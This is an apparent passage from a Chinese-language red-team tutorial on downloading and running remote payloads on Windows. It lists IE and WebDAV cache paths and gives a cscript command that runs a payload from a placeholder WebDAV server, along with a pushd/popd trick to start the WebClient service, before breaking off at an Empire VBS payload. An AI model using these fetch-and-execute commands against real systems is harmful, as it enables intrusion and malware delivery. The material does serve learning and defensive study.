声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。
取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。
Cscript/Wscript下载&执行
执行远程vbs脚本的基本命令格式为:
cscript //E:jscript \\webdavserver\folder\payload.txt
网络调用进程:svchost.exe,payload位置:WebDav客户端本地缓存。
此外,也可以利用powershell执行vbs脚本,首先生成Empire的vbs payload